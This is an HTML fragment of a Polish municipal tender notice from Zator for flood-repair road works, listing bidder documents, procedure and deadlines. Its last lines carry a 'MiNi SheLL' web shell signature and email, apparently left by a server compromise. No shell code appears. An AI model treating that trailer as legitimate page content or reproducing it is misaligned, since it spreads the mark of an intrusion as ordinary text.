<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
</li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1/ Wypełniony i podpisany przez uprawnionego przedstawiciela do reprezentowania wykonawcy formularz ofertowy - załącznik nr 1;
      2/ podpisane przez uprawnionego przedstawiciela do reprezentowania wykonawcy oświadczenie   Wykonawcy zgodnie z art. 22 ust. 1 pkt 1-4 Ustawy - zał. nr 2 do oferty.
      3/ podpisane przez uprawnionego przedstawiciela do reprezentowania wykonawcy oświadczenie Wykonawcy zgodnie z art. 24 ust. 1 i 2 Ustawy - zał. nr 3 do oferty.
     4/ Oświadczenie o uprawnieniach i doświadczeniu kierownika budowy (min. 3 lata) oraz ilości pracowników przewidzianych do wykonania zamówienia - zał. nr 4 do oferty (uprawnienia kierownika budowy do wglądu przed podpisaniem umowy).   
     5/ Oświadczenie, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert, (tj. od 16.04.2007 r.), a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali zgodnie z zasadami sztuki budowlanej i prawidłowo ukończyli co najmniej 2 roboty budowlane odpowiadające swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia (tj. 2 roboty drogowe bitumiczne na dł. min. 1.400 mb każda), wraz z  referencjami  - zał. nr 5 do oferty.
     6/ Oświadczenie o zakresie robót powierzonych podwykonawcy  - zał. nr 6 do oferty.
     7/ Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, albo dane i informacje zawarte w CEIDG (wydruk) - zał. nr 7.
     8/ Kopię aktualnej i opłaconej polisy lub innego dokumentu ubezpieczenia potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności, związanej z przedmiotem zamówienia -  zał. nr 8.
   	9/ Kosztorysy ofertowe, uproszczone lub szczegółowe, w układzie jak w załączonych przedmiarach - zał. nr 9.
     10/ Dowód wniesienia wadium - zał. nr 10.
Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, musi spełniać odpowiednio warunki  opisane w § 4 Rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2009 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane.
Jeżeli, w przypadku wykonawcy mającego siedzibę na terytorium Rzeczypospolitej Polskiej, osoby, o których mowa w art. 24 ust. 1 pkt 5-8 ustawy, mają miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, musi on spełniać odpowiednio warunki  opisane w § 2 ust. 2 powyższego rozporządzenia.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zator.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SIWZ w wersji papierowej (odpłatnie - 20 gr. za każdą stronę A4 - wydruk ze strony internetowej Zamawiającego w formie arkuszy A-4), można odebrać w siedzibie Zamawiającego pok. nr 113,  lub pocztą.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.04.2012 godzina 10:00, miejsce: Urząd Miejski w Zatorze, 32-640      Zator, Plac Marszałka Józefa Piłsudskiego 1, pok. 202.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> - Informacji w sprawie przetargu udzielają:
      Leszek Bednarski  - Urząd Miejski w Zatorze, tel. (0-33) 8412 215, wew. 13, 23
   - Zadanie dofinansowane z budżetu państwa, w ramach usuwania skutków powodzi z maja  2010 r..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com